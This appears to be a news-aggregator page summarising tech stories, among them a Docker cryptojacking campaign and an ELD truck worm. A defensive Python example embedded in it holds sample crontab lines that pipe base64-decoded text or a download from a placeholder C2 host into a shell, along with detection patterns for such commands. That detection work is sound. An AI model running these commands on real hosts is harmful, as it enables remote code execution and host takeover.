Advertising

Roku's New HDMI Tech Could Show Ads When You Pause Your Game (kotaku.com)

An anonymous reader quotes a report from Kotaku: A new patent recently filed by TV and streaming device manufacturer Roku hints toward a possible future where televisions could display ads when you pause a movie or game. For Roku, the time in which the TV is on but users aren't doing anything is valuable. The company has started leasing out ad space in its popular Roku City screensaver -- which appears when your TV is idle -- to companies like McDonald's and movies like Barbie. As tech newsletter Lowpass points out, Roku finds this idle time and its screensaver so valuable that it forbids app developers from overriding the screensaver with their own. But, if you plug in an Xbox or DVD player into the HDMI port on a Roku TV, you bypass the company's screensaver and other ads. And so, Roku has been figuring out a way to not let that happen.

As reported by Lowpass on April 4, Roku recently filed a patent for a technology that would let it inject ads into third-party content -- like an Xbox game or Netflix movie -- using an HDMI connection. The patent describes a situation where you are playing a video game and hit pause to go check your phone or grab some food. At this point, Roku would identify that you have paused the content and display a relevant ad until you unpaused the game. Roku's tech isn't designed to randomly inject ads as you are playing a game or watching a movie, it knows that would be going too far and anger people. Instead, the patent suggests several ways that Roku could spot when your TV is paused, like comparing frames, to make sure the user has actually paused the content. Roku might also use the HDMI's audio feed to search for extended moments of silence. The company also proposes using HDMI CEC -- a protocol designed to help devices communicate better -- to figure out when you pause and unpause content. Similarly, Roku's patent explains that it will use various methods to detect what people are playing or watching and try to display relevant ads. So if it sees you have an Xbox plugged in, it might try to serve you ads that it thinks an Xbox owner would be interested in.

IT

PCIe 7.0 On Track For a 2025 Release (pcgamer.com)

An anonymous reader shares a PC Gamer report: PCI Express 7.0 is coming. But don't feel as though you need to start saving for a new motherboard anytime soon. The PCI-SIG has just released the 0.5 version, with the final version set for release in 2025. That means supporting devices are not likely to land until 2026, with 2027-28 likely to be the years we see a wider rollout. PCIe 7.0 will initially be far more relevant to the enterprise market, where bandwidth-hungry applications like AI and networking will benefit. Anyway, it's not like the PC market is saturated with PCIe 5.0 devices, and PCIe 6.0 is yet to make its way into our gaming PCs.

PCI Express bandwidth doubles every generation, so PCIe 7.0 will deliver a maximum data rate up to 128 GT/s. That's a whopping 8x faster than PCIe 4.0 and 4x faster than PCIe 5.0. This means PCIe 7.0 is capable of delivering up to 512GB/s of bi-directional throughput via a x16 connection and 128GB/s for an x4 connection. More bandwidth will certainly be beneficial for CPU to chipset links, which means multiple integrated devices like 10G networking, WiFi 7, USB 4, and Thunderbolt 4 will all be able to run on a consumer motherboard without compromise. And just imagine what all that bandwidth could mean for PCIe 7.0 SSDs. In the years to come, a PCIe 7.0 x4 SSD could approach sequential transfer rates of up to 60GB/s. We'll need some serious advances in SSD controller and NAND flash technologies to see speeds in that range, but still, it's an attractive proposition.
Further reading: PCIe 7.0 first official draft lands, doubling bandwidth yet again.

The Internet

Researchers Unlock Fiber Optic Connection 1.2 Million Times Faster Than Broadband (popsci.com)

An anonymous reader quotes a report from Popular Science: In the average American house, any download rate above roughly 242 Mbps is considered a solidly speedy broadband internet connection. That's pretty decent, but across the Atlantic, researchers at UK's Aston University recently managed to coax about 1.2 million times that rate using a single fiber optic cable -- a new record for specific wavelength bands. As spotted earlier today by Gizmodo, the international team achieved a data transfer rate of 301 terabits, or 301,000,000 megabits per second, by accessing new wavelength bands normally unreachable in existing optical fibers -- the tiny, hollow glass strands that carry data through beams of light. According to Aston University's recent profile, you can think of these different wavelength bands as different colors of light shooting through a (largely) standard cable.

Commercially available fiber cabling utilizes what are known as C- and L-bands to transmit data. By constructing a device called an optical processor, however, researchers could access the never-before-used E- and S-bands. "Over the last few years Aston University has been developing optical amplifiers that operate in the E-band, which sits adjacent to the C-band in the electromagnetic spectrum but is about three times wider," Ian Phillips, the optical processor's creator, said in a statement. "Before the development of our device, no one had been able to properly emulate the E-band channels in a controlled way." But in terms of new tech, the processor was basically it for the team's experiment. "Broadly speaking, data was sent via an optical fiber like a home or office internet connection," Phillips added. What's particularly impressive and promising about the team's achievement is that they didn't need new, high-tech fiber optic lines to reach such blindingly fast speeds. Most existing optical cables have always technically been capable of reaching E- and S-bands, but lacked the equipment infrastructure to do so. With further refinement and scaling, internet providers could ramp up standard speeds without overhauling current fiber optic infrastructures.

Transportation

Will EVs Kill the Stick Shift Car? (cnn.com)

A CNN opinion piece looks at "the moaning about manual transmission's demise," noting that "it's not just Europeans (literally) clinging on. In the U.S., there's apparently a young (also predominantly male) demographic that is embracing manual driving — championing it as retro, much like Gen Z's affinity to typewriters and vintage cameras.

"They feel there's something authentic about it: a connection between driver and vehicle that automatization cuts out." But CNN's writer argues the case against stick shifts... [Automatic vehicles] chalk up better mileage and drive faster than their stick-shift counterparts. The explanation: automatics select the right gear for the vehicle, usually the highest gear possible. The average manual driver is not always so proficient. In getting the gear right, automatics consume less fuel, save money and emit fewer emissions.

These are among the reasons why it's ever harder to buy a new manual-transmission model of any kind in many countries. In the US, less than 1% of new models have stick shifts (compared to 35% in 1980), according to the Environmental Protection Agency. It's really only sports cars, off-road truck SUVs and a handful of small pickups that still have clutches.... While all gasoline-run cars and trucks are climate killers with stick shifts being the slightly worse of two evils, combustion-engine automatics themselves are on their way out. They are tooling along the highway side-by-side with their stick-and-clutch counterparts toward the junkyard of history. Electric vehicles have gear systems, too: a single speed transmission that transmits energy from the motor to the wheels. But because only one gear exists, there is no switching of gears, neither automatically nor manually...

Road transportation accounts for 15% of the world's greenhouse gas emissions, according to Our World Data, as well as being a huge contributor to the air pollution that claims around nine million deaths a year from respiratory and lung diseases. Transportation noise, though less deadly, also contributes to stress and sleep disorders. Thankfully, there's a convenient way to circumvent these blights: electric vehicles...

But for those aficionados who really can't go without a clutch and gear shifter, Toyota is planning a realistic-feeling fake manual transmission for some EV models. It serves no purpose whatsoever — save to comfort bruised egos.

Books

Has 'Silicon Valley-style Startup Disruption' Arrived for Book Publishing? (thebaffler.com)

The Baffler says a new publishing house launched earlier this month "brings Silicon Valley-style startup disruption to the business of books."

Authors Equity has "a tiny core staff, offloading its labor to a network of freelancers," and like a handful of other publishers "is upending the way that authors get paid, eschewing advances and offering a higher percentage of profits instead." It is worth watching because its team includes several of the most important publishing people of the twenty-first century. And if it works, it will offer a model for tightening the connection between book culture and capitalism, a leap forward for the forces of efficiency and the fantasies of frictionless markets, ushering in a world where literature succeeds if and only if it sells....

Authors Equity's website presents its vision in strikingly neoliberal corporatespeak. The company has four Core Principles: Aligned Incentives; Bespoke Teams; Flexibility and Transparency; and Long-Term Collaboration. What do they mean by these MBA keywords? Aligned Incentives is explained in the language of human capital: "Our profit-share model rewards authors who want to bet on themselves." Authors, that is, take on more of the financial risk of publication. At a traditional publishing house, advances provide authors with guaranteed cash early in the process that they can use to live off while writing. With Authors Equity, nothing is guaranteed and nothing given ahead of time; an author's pay depends on their book's profits.

In an added twist, "Profit participation is also an option for key members of the book team, so we're in a position to win together." Typically, only an author's agent's income is directly tied to an author's financial success, but at Authors Equity, others could have a stake. This has huge consequences for the logic of literary production. If an editor, for example, receives a salary and not a cut of their books' profits, their incentives are less immediately about profit, offering more wiggle room for aesthetic value. The more the people working on books participate in their profits, the more, structurally, profit-seeking will shape what books look like.

"Bespoke Teams" is a euphemism for gigification. With a tiny initial staff of six, Authors Equity uses freelance workers to make books, unlike traditional publishers, which have many employees in many departments... Their fourth Core Principle — Long-Term Collaboration — addresses widespread frustration with a systemic problem in traditional publishing: the fetishization of debut authors who receive decent or better advances, fail to earn out, and then struggle to have a career. It's a real problem and one where authors' interests and capitalist rationalization are, as it were, aligned. Authors Equity sees that everyone might profit when an author can build a readership and develop their skill.

The article concludes with this prediction. "It's not impossible that we'll look back in twenty years and see its founding as auguring the beginning of the startup age in publishing."

Food for thought... Pulp-fiction mystery writer Mickey Spillane once said, "I'm a writer, not an author. The difference is, a writer makes money."

Transportation

Truck-To-Truck Worm Could Infect Entire US Fleet (theregister.com)

Jessica Lyons reports via The Register: Vulnerabilities in common Electronic Logging Devices (ELDs) required in US commercial trucks could be present in over 14 million medium- and heavy-duty rigs, according to boffins at Colorado State University. In a paper presented at the 2024 Network and Distributed System Security Symposium, associate professor Jeremy Daily and systems engineering graduate students Jake Jepson and Rik Chatterjee demonstrated how ELDs can be accessed over Bluetooth or Wi-Fi connections to take control of a truck, manipulate data, and spread malware between vehicles. "These findings highlight an urgent need to improve the security posture in ELD systems," the trio wrote [PDF].

The authors did not specify brands or models of ELDs that are vulnerable to the security flaws they highlight in the paper. But they do note there's not too much diversity of products on the market. While there are some 880 devices registered, "only a few tens of distinct ELD models" have hit the road in commercial trucks. A federal mandate requires most heavy-duty trucks to be equipped with ELDs, which track driving hours. These systems also log data on engine operation, vehicle movement and distances driven -- but they aren't required to have tested safety controls built in. And according to the researchers, they can be wirelessly manipulated by another car on the road to, for example, force a truck to pull over.

The academics pointed out three vulnerabilities in ELDs. They used bench level testing systems for the demo, as well as additional testing on a moving 2014 Kenworth T270 Class 6 research truck equipped with a vulnerable ELD. [...] For one of the attacks, the boffins showed how anyone within wireless range could use the device's Wi-Fi and Bluetooth radios to send an arbitrary CAN message that could disrupt some of the vehicle's systems. A second attack scenario, which also required the attacker to be within wireless range, involved connecting to the device and uploading malicious firmware to manipulate data and vehicle operations. Finally, in what the authors described as the "most concerning" scenario, they uploaded a truck-to-truck worm. The worm uses the compromised device's Wi-Fi capabilities to search for other vulnerable ELDs nearby. After finding the right ELDs, the worm uses default credentials to establish a connection, drops its malicious code on the next ELD, overwrites existing firmware, and then starts the process over again, scanning for additional devices. "Such an attack could lead to widespread disruptions in commercial fleets, with severe safety and operational implications," the researchers warned.

Mozilla

Mozilla Drops Onerep After CEO Admits To Running People-Search Networks (krebsonsecurity.com)

An anonymous reader quotes a report from KrebsOnSecurity: The nonprofit organization that supports the Firefox web browser said today it is winding down its new partnership with Onerep, an identity protection service recently bundled with Firefox that offers to remove users from hundreds of people-search sites. The move comes just days after a report by KrebsOnSecurity forced Onerep's CEO to admit that he has founded dozens of people-search networks over the years. Mozilla only began bundling Onerep in Firefox last month, when it announced the reputation service would be offered on a subscription basis as part of Mozilla Monitor Plus. Launched in 2018 under the name Firefox Monitor, Mozilla Monitor also checks data from the website Have I Been Pwned? to let users know when their email addresses or passwords are leaked in data breaches. On March 14, KrebsOnSecurity published a story showing that Onerep's Belarusian CEO and founder Dimitri Shelest launched dozens of people-search services since 2010, including a still-active data broker called Nuwber that sells background reports on people. Onerep and Shelest did not respond to requests for comment on that story.

But on March 21, Shelest released a lengthy statement wherein he admitted to maintaining an ownership stake in Nuwber, a consumer data broker he founded in 2015 -- around the same time he launched Onerep. Shelest maintained that Nuwber has "zero cross-over or information-sharing with Onerep," and said any other old domains that may be found and associated with his name are no longer being operated by him. "I get it," Shelest wrote. "My affiliation with a people search business may look odd from the outside. In truth, if I hadn't taken that initial path with a deep dive into how people search sites work, Onerep wouldn't have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and I'm aiming to do better in the future." The full statement is available here (PDF).

In a statement released today, a spokesperson for Mozilla said it was moving away from Onerep as a service provider in its Monitor Plus product. "Though customer data was never at risk, the outside financial interests and activities of Onerep's CEO do not align with our values," Mozilla wrote. "We're working now to solidify a transition plan that will provide customers with a seamless experience and will continue to put their interests first." KrebsOnSecurity also reported that Shelest's email address was used circa 2010 by an affiliate of Spamit, a Russian-language organization that paid people to aggressively promote websites hawking male enhancement drugs and generic pharmaceuticals. As noted in the March 14 story, this connection was confirmed by research from multiple graduate students at my alma mater George Mason University.

Shelest denied ever being associated with Spamit. "Between 2010 and 2014, we put up some web pages and optimize them -- a widely used SEO practice -- and then ran AdSense banners on them," Shelest said, presumably referring to the dozens of people-search domains KrebsOnSecurity found were connected to his email addresses (dmitrcox@gmail.com and dmitrcox2@gmail.com). "As we progressed and learned more, we saw that a lot of the inquiries coming in were for people." Shelest also acknowledged that Onerep pays to run ads "on a handful of data broker sites in very specific circumstances." "Our ad is served once someone has manually completed an opt-out form on their own," Shelest wrote. "The goal is to let them know that if they were exposed on that site, there may be others, and bring awareness to there being a more automated opt-out option, such as Onerep."

Communications

Cable ISP Fined $10,000 For Lying To FCC About Where It Offers Broadband (arstechnica.com)

An Internet service provider that admitted lying to the FCC about where it offers broadband will pay a $10,000 fine and implement a compliance plan to prevent future violations. ArsTechnica: Jefferson County Cable (JCC), a small ISP in Toronto, Ohio, admitted that it falsely claimed to offer fiber service in an area that it hadn't expanded to yet. A company executive also admitted that the firm submitted false coverage data to prevent other ISPs from obtaining government grants to serve the area. Ars helped expose the incident in a February 2023 article.

The FCC announced the outcome of its investigation on March 15, saying that Jefferson County Cable violated the Broadband Data Collection program requirements and the Broadband DATA Act, a US law, "in connection with reporting inaccurate information or data with respect to the Company's ability to provide broadband Internet access service." The FCC said: "To settle this matter, Jefferson County Cable agrees to pay a $10,000 civil penalty to the United States Treasury. Jefferson County Cable also agrees to implement enhanced compliance measures. This action will help further the Commission's efforts to bridge the digital divide by having accurate data of locations where broadband service is available."

Google

Google is Bringing Satellite Messaging To Android 15 (theverge.com)

Google's second developer preview for Android 15 has arrived, bringing long-awaited support for satellite connectivity alongside several improvements to contactless payments, multi-language recognition, volume consistency, and interaction with PDFs via apps. From a report: These developer-focused betas are a proving ground for features that will likely make it into the final public release scheduled for later this year. According to Google, public beta releases should be available to test between April and July. The latest developer preview addresses some nuisances and security concerns experienced by Android users, such as making apps more aware of why some services might be unavailable when devices are using a satellite connection. This is also the first official confirmation that Android 15 will come with satellite messaging, with Google's press release saying that the new preview includes support for "preloaded RCS applications to use satellite connectivity for sending and receiving messages."

Google

Google Reshapes Fitbit In Its Image As Users Allege 'Planned Obsolescence' (arstechnica.com)

An anonymous reader quotes a report from Ars Technica: Google closed its Fitbit acquisition in 2021. Since then, the tech behemoth has pushed numerous changes to the wearable brand, including upcoming updates announced this week. While Google reshapes its fitness tracker business, though, some long-time users are regretting their Fitbit purchases and questioning if Google's practices will force them to purchase their next fitness tracker elsewhere.

As is becoming common practice with consumer tech announcements of late, Google's latest announcements about Fitbit seemed to be trying to convince users of the wonders of generative AI and how that will change their gadgets for the better. In a blog post yesterday, Dr. Karen DeSalvo, Google's chief health officer, announced that Fitbit Premium subscribers would be able to test experimental AI features later this year (Google hasn't specified when). "You will be able to ask questions in a natural way and create charts just for you to help you understand your own data better. For example, you could dig deeper into how many active zone minutes... you get and the correlation with how restorative your sleep is," she wrote. DeSalvo's post included an example of a user asking a chatbot if there was a connection between their sleep and activity and said that the experimental AI features will only be available to "a limited number of Android users who are enrolled in the Fitbit Labs program in the Fitbit mobile app."

Fitbit is also working with the Google Research team and "health and wellness experts, doctors, and certified coaches" to develop a large language model (LLM) for upcoming Fitbit mobile app features that pull data from Fitbit and Pixel devices, DeSalvo said. In a blog post yesterday, Yossi Matias, VP of engineering and research at Google, said Google wants to use the LLM to add personalized coaching features, such as the ability to look for sleep irregularities and suggest actions "on how you might change the intensity of your workout." Google's Fitbit is building the LLM on Gemini models that are tweaked on de-identified data from unspecified "research case studies," Matias said, adding: "For example, we're testing performance using sleep medicine certification exam-like practice tests." Other recent changes to Fitbit include a name tweak from Fitbit by Google, to Google Fitbit, as spotted by 9to5Google this week.

Charge 5 users are especially concerned after users noticed their devices suddenly stopped holding a charge after a December firmware update was pushed. The problem has persisted, with Google offering no solution other than offering discounts or, if the device was within its warranty period, a replacement.

"This is called planned obsolescence. I'll be upgrading to a watch style tracker from a different company. I wish Fitbit hadn't sold out to Google," a forum user going by Sean77024 wrote on Fitbit's support forum yesterday. "Others, like 2MeFamilyFlyer, have also accused Fitbit of planning Charge 5 obsolescence," notes Ars. "2MeFamilyFlyer said they're seeking a Fitbit alternative."

Open Source

OpenTTD (Unofficial Remake of 'Transport Tycoon Deluxe' Game) Turns 20 (openttd.org)

In 1995 Scottish video game designer Chris Sawyer created the business simulator game Transport Tycoon Deluxe — and within four years, Wikipedia notes, work began on the first version of an open source version that's still being actively developed. "According to a study of the 61,154 open-source projects on SourceForge in the period between 1999 and 2005, OpenTTD ranked as the 8th most active open-source project to receive patches and contributions. In 2004, development moved to their own server."

Long-time Slashdot reader orudge says he's been involved for almost 25 years. "Exactly 21 years ago, I received an ICQ message (look it up, kids) out of the blue from a guy named Ludvig Strigeus (nicknamed Ludde)." "Hello, you probably don't know me, but I've been working on a project to clone Transport Tycoon Deluxe for a while," he said, more or less... Ludde made more progress with the project [written in C] over the coming year, and it looks like we even attempted some multiplayer games (not too reliable, especially over my dial-up connection at the time). Eventually, when he was happy with what he had created, he agreed to allow me to release the game as open source. Coincidentally, this happened exactly a year after I'd first spoken to him, on the 6th March 2004...

Things really got going after this, and a community started to form with enthusiastic developers fixing bugs, adding in new features, and smoothing off the rough edges. Ludde was, I think, a bit taken aback by how popular it proved, and even rejoined the development effort for a while. A read through the old changelogs reveals just how many features were added over a very short period of time. Quick wins like higher vehicle limits came in very quickly, and support for TTDPatch's NewGRF format started to be functional just four months later. Large maps, improved multiplayer, better pathfinders, improved TTDPatch compatibility, and of course, ports to a great many different operating systems, such as Mac OS X, BeOS, MorphOS and OS/2. It was a very exciting time to be a TTD fan!

Within six years, ambitious projects to create free replacements for the original TTD graphics, sounds and music sets were complete, and OpenTTD finally had its 1.0 release. And while we may not have the same frantic addition of new features we had in 2004, there have still been massive improvements to the code, with plenty of exciting new features over the years, with major releases every year since 2008. The move to GitHub in 2018 and the release of OpenTTD on Steam in 2021 have also re-energised development efforts, with thousands of people now enjoying playing the game regularly. And development shows no signs of slowing down, with the upcoming OpenTTD 14.0 release including over 40 new features!

"Personally, I would like to say thank you to everyone who has supported OpenTTD development over the past two decades..." they write, adding "Finally, of course, I'd like to thank you, the players! None of us would be here if people weren't still playing the game.

"Seeing how the first twenty years have gone, I can't wait to see what the next twenty years have in store. :)"

Security

Misconfigured Cloud Servers Targeted with Linux Malware for New Cryptojacking Campaign (cadosecurity.com)

Researchers at Cado Security Labs received an alert about a honeypot using the Docker Engine API. "A Docker command was received..." they write, "that spawned a new container, based on Alpine Linux, and created a bind mount for the underlying honeypot server's root directory..." Typically, this is exploited to write out a job for the Cron scheduler to execute... In this particular campaign, the attacker exploits this exact method to write out an executable at the path /usr/bin/vurl, along with registering a Cron job to decode some base64-encoded shell commands and execute them on the fly by piping through bash.

The vurl executable consists solely of a simple shell script function, used to establish a TCP connection with the attacker's Command and Control (C2) infrastructure via the /dev/tcp device file. The Cron jobs mentioned above then utilise the vurl executable to retrieve the first stage payload from the C2 server... To provide redundancy in the event that the vurl payload retrieval method fails, the attackers write out an additional Cron job that attempts to use Python and the urllib2 library to retrieve another payload named t.sh.
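The two indicators described above (a container created through the Docker Engine API with a bind mount of the host's root directory, and a Cron entry that decodes base64 and pipes it into a shell or fetches a payload with vurl) are the kind of thing a honeypot or host-monitoring rule can flag directly. The following is an added example, not code from Cado's report: the container-create request bodies and crontab lines are constructed, the C2 URL is a placeholder, and the list of sensitive host paths goes a little beyond the root directory the report mentions (it also covers the Docker socket, which gives the same control over the host).

```python
"""Detection helpers for the Docker API abuse and Cron persistence described above.
Added example; all sample data below is constructed, not taken from the report."""
import json
import re

# Constructed sample: a /containers/create body as a honeypot might log it.
# Binding "/" into the container lets the attacker write to the host filesystem.
SAMPLE_CREATE_REQUEST = json.dumps({
    "Image": "alpine:latest",
    "Cmd": ["sh"],
    "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
})

# Constructed sample using the newer Mounts form; the Docker socket is as bad as "/".
SOCKET_CREATE_REQUEST = json.dumps({
    "Image": "alpine:latest",
    "HostConfig": {"Mounts": [{"Type": "bind",
                               "Source": "/var/run/docker.sock",
                               "Target": "/var/run/docker.sock"}]},
})

# Constructed benign request: a read-only bind of an ordinary directory.
BENIGN_CREATE_REQUEST = json.dumps({
    "Image": "nginx:latest",
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
})

# Host paths that should never be bind-mounted into an untrusted container
# (assumption: extend to taste for your environment).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/run/docker.sock", "/proc", "/sys")


def _host_source_paths(host_config):
    """Yield every host path a container-create request asks to bind-mount."""
    # Legacy form: "host_path:container_path[:options]" strings.
    for bind in host_config.get("Binds") or []:
        yield bind.split(":", 1)[0]
    # Newer form: Mounts entries with Type/Source/Target.
    for mount in host_config.get("Mounts") or []:
        if mount.get("Type") == "bind" and mount.get("Source"):
            yield mount["Source"]


def inspect_create_request(body):
    """Return a list of findings for a /containers/create request body (JSON text)."""
    req = json.loads(body)
    host_config = req.get("HostConfig") or {}
    findings = []
    for src in _host_source_paths(host_config):
        norm = src.rstrip("/") or "/"      # "/" stays "/", "/etc/" becomes "/etc"
        if norm in SENSITIVE_HOST_PATHS:
            findings.append(f"bind mount of sensitive host path {src!r}")
    if host_config.get("Privileged"):
        findings.append("privileged container")
    if host_config.get("PidMode") == "host":
        findings.append("host PID namespace")
    return findings


# Constructed crontab modelled on the persistence technique in the report.
# The C2 URL is a placeholder, not a real indicator.
SAMPLE_CRON = """\
# m h dom mon dow user command
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
* * * * * root echo ZWNobyBoaQ== | base64 -d | bash
* * * * * root /usr/bin/vurl http://C2-PLACEHOLDER.invalid/stage1 | sh
"""

CRON_INDICATORS = [
    (re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b"),
     "base64-decoded command piped to shell"),
    (re.compile(r"/dev/tcp/"), "raw /dev/tcp socket use"),
    (re.compile(r"\b(curl|wget|vurl)\b[^|]*\|\s*(ba)?sh\b"),
     "download piped to shell"),
]


def scan_crontab(text):
    """Return (line_number, label) pairs for crontab lines matching an indicator."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, label in CRON_INDICATORS:
            if pattern.search(stripped):
                hits.append((lineno, label))
    return hits


if __name__ == "__main__":
    for name, body in [("root bind", SAMPLE_CREATE_REQUEST),
                       ("docker.sock bind", SOCKET_CREATE_REQUEST),
                       ("benign", BENIGN_CREATE_REQUEST)]:
        print(name, "->", inspect_create_request(body) or "no findings")
    for lineno, label in scan_crontab(SAMPLE_CRON):
        print(f"crontab line {lineno}: {label}")
```

The request check belongs at the point where the Docker API is exposed (an audit log of the engine, or a proxy in front of it); the crontab check is a file-integrity or scheduled-task rule. Neither replaces the real fix the report implies, which is not exposing the Docker Engine API to the internet without authentication at all.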

"Multiple user mode rootkits are deployed to hide malicious processes," they note. And one of the shell scripts "makes use of the shopt (shell options) built-in to prevent additional shell commands from the attacker's session from being appended to the history file... Not only are additional commands prevented from being written to the history file, but the shopt command itself doesn't appear in the shell history once a new session has been spawned."

The same script also inserts "an attacker-controlled SSH key to maintain access to the compromised host," according to the article, retrieves a miner for the Monero cryptocurrency and then "registers persistence in the form of systemd services" for both the miner and an open source Golang reverse shell utility named Platypus.

It also delivers "various utilities," according to the blog Security Week, "including 'masscan' for host discovery." Citing CADO's researchers, they write that the shell script also "weakens the machine by disabling SELinux and other functions and by uninstalling monitoring agents." The Golang payloads deployed in these attacks allow attackers to search for Docker images from the Ubuntu or Alpine repositories and delete them, and identify and exploit misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet... ["For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host," the researchers write.]

"This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers," Cado notes. "It's clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments."

Encryption

Signal's New Usernames Help Keep Cops Out of Your Data (theintercept.com) 39

Longtime Slashdot reader SonicSpike shares a report from The Intercept: With the new version of Signal, you will no longer broadcast your phone number to everyone you send messages to by default, though you can choose to if you want. Your phone number will still be displayed to contacts who already have it stored in their phones. Going forward, however, when you start a new conversation on Signal, your number won't be shared at all: Contacts will just see the name you use when you set up your Signal profile. So even if your contact is using a custom Signal client, for example, they still won't be able to discover your phone number since the service will never tell it to them.

You also now have the option to set a username, which Signal lets you change whenever you want and delete when you don't want it anymore. Rather than directly storing your username as part of your account details, Signal stores a cryptographic hash of your username instead; Signal uses the Ristretto 25519 hashing algorithm, essentially storing a random block of data instead of usernames themselves. This is like how online services can confirm a user's password is valid without storing a copy of the actual password itself. "As far as we're aware, we're the only messaging platform that now has support for usernames that doesn't know everyone's usernames by default," said Josh Lund, a senior technologist at Signal. The move is yet another piece of the Signal ethos to keep as little data on hand as it can, lest the authorities try to intrude on the company. Whittaker explained, "We don't want to be forced to enumerate a directory of usernames." [...]

If Signal receives a subpoena demanding that they hand over all account data related to a user with a specific username that is currently active at the time that Signal looks it up, they would be able to link it to an account. That means Signal would turn over that user's phone number, along with the account creation date and the last connection date. Whittaker stressed that this is "a pretty narrow pipeline that is guarded viciously by ACLU lawyers," just to obtain a phone number based on a username. Signal, though, can't confirm how long a given username has been in use, how many other accounts have used it in the past, or anything else about it. If the Signal user briefly used a username and then deleted it, Signal wouldn't even be able to confirm that it was ever in use to begin with, much less which accounts had used it before.

In short, if you're worried about Signal handing over your phone number to law enforcement based on your username, you should only set a username when you want someone to contact you, and then delete it afterward. And each time, always set a different username. Likewise, if you want someone to contact you securely, you can send them your Signal link, and, as soon as they make contact, you can reset the link. If Signal receives a subpoena based on a link that was already reset, it will be impossible for them to look up which account it was associated with. If the subpoena demands that Signal turn over account information based on a phone number, rather than a username, Signal could be forced to hand over the cryptographic hash of the account's username, if a username is set. It would be difficult, however, for law enforcement to learn the actual username itself based on its hash. If they already suspect a username, they could use the hash to confirm that it's real. Otherwise, they would have to guess the username using password cracking techniques like dictionary attacks or rainbow tables.
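The property the article describes, that a directory keyed on username hashes can answer "which account holds this username right now?" but cannot enumerate usernames or recover a deleted one, is easiest to see in a small model of the data store. The following is an added illustration, not Signal's code: SHA-256 stands in for the Ristretto 25519 hashing the article mentions (only the "store a digest, not the name" property matters here), and the account data is constructed.

```python
"""Toy model of a username directory that stores only username hashes.
Added illustration; SHA-256 is a stand-in for Signal's Ristretto 25519 hashing,
and every account value below is constructed."""
import hashlib


def username_hash(username: str) -> str:
    # Stand-in hash function (assumption). The directory keeps this digest,
    # never the username string itself.
    return hashlib.sha256(username.encode("utf-8")).hexdigest()


class UsernameDirectory:
    def __init__(self):
        # phone -> account metadata; the username hash is the only username-derived field
        self._accounts = {}
        # username hash -> phone, present only while that username is set
        self._by_hash = {}

    def register(self, phone, created, last_seen):
        self._accounts[phone] = {"created": created, "last_seen": last_seen,
                                 "username_hash": None}

    def set_username(self, phone, username):
        h = username_hash(username)
        if h in self._by_hash and self._by_hash[h] != phone:
            raise ValueError("username already taken")
        self.clear_username(phone)
        self._accounts[phone]["username_hash"] = h
        self._by_hash[h] = phone

    def clear_username(self, phone):
        old = self._accounts[phone]["username_hash"]
        if old is not None:
            del self._by_hash[old]
            self._accounts[phone]["username_hash"] = None
        # No history is kept: once cleared, nothing records that the name was ever used.

    def lookup_by_username(self, username):
        """What a request keyed on a currently active username can yield:
        the phone number plus creation and last-connection dates, nothing more."""
        phone = self._by_hash.get(username_hash(username))
        if phone is None:
            return None
        acct = self._accounts[phone]
        return {"phone": phone, "created": acct["created"], "last_seen": acct["last_seen"]}

    def lookup_by_phone(self, phone):
        """What a request keyed on a phone number can yield about the username:
        only its hash, and only if a username is currently set."""
        acct = self._accounts.get(phone)
        return None if acct is None else acct["username_hash"]


def demo():
    """Walk through set -> lookup -> delete and return what each lookup sees."""
    d = UsernameDirectory()
    d.register("+15555550100", "2024-03-01", "2024-04-05")   # constructed account
    d.set_username("+15555550100", "example.01")
    active = d.lookup_by_username("example.01")     # resolvable while the name is set
    hash_only = d.lookup_by_phone("+15555550100")   # phone-keyed request sees just the hash
    d.clear_username("+15555550100")
    after_delete = d.lookup_by_username("example.01")   # None: nothing left to link
    return active, hash_only, after_delete


if __name__ == "__main__":
    for label, value in zip(("active", "hash_only", "after_delete"), demo()):
        print(label, "->", value)
```

The model also shows why the article's last point holds: given the hash from `lookup_by_phone`, the only way back to the username is to hash candidate names and compare, which is exactly the password-cracking situation the article alludes to, and a long, unguessable username is the defence against it.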

Piracy

In Indonesia, Women Pirate More Music and Movies Than Men (torrentfreak.com) 36

Piracy was traditionally seen as something that predominantly young males were interested in. This is a largely outdated representation of reality, as girls and women began to catch up a long time ago. In some countries, including Indonesia, more women pirate music, movies, and TV-shows than their male counterparts. TorrentFreak reports: [N]ew findings published by researchers from Northumbria University Newcastle, which include gender, are worth highlighting. The survey data, looking at piracy trends in Thailand and Indonesia, was released by Marketing professor Dr. Xuemei Bian and Ms. Humaira Farid. The results were presented to WIPO's Advisory Committee on Enforcement recently and the associated presentation (PDF) was published online. Through an online survey and in-person interviews, the research aims to map consumer attitudes and behaviors in Indonesia and Thailand, particularly in connection with online copyright infringement.

One of the overall conclusions is that piracy remains a common activity in both Asian countries. Pirates are present in all age groups, and music, movies and TV-shows tend to be in highest demand. Younger people, those under 40, are more likely to pirate than their older counterparts. These findings are not out of the ordinary and the same trends are visible in other countries too. Interestingly, however, some notable differences between the two countries appear when gender is added to the mix. The tables below show that women are more likely to pirate than men in Indonesia. This is true for all content categories, except for software, where men are slightly in the lead. In Thailand, however, men are more likely to pirate across all categories. The researchers do not attempt to explain these differences. However, they show once again that 'dated' gender stereotypes don't always match with reality. And when they have little explanatory value, one can question whether gender is even relevant in a piracy context.

Looking at other differences between Thai and Indonesian consumers there are some other notable findings. For example, in Indonesia, 64% of the respondents say they're aware of the availability of pirated movies and TV-shows on YouTube, compared to 'just' 32% in Thailand. Indonesian consumers are also more familiar with music piracy sites and pirate much more frequently than Thai consumers, as the table below shows. Finally, the researchers also looked at various attitudes toward piracy. This shows that Thai pirates would be most likely to stop if legal services were more convenient, while Indonesian pirates see cheaper legal services as the largest discouraging factor.

Google

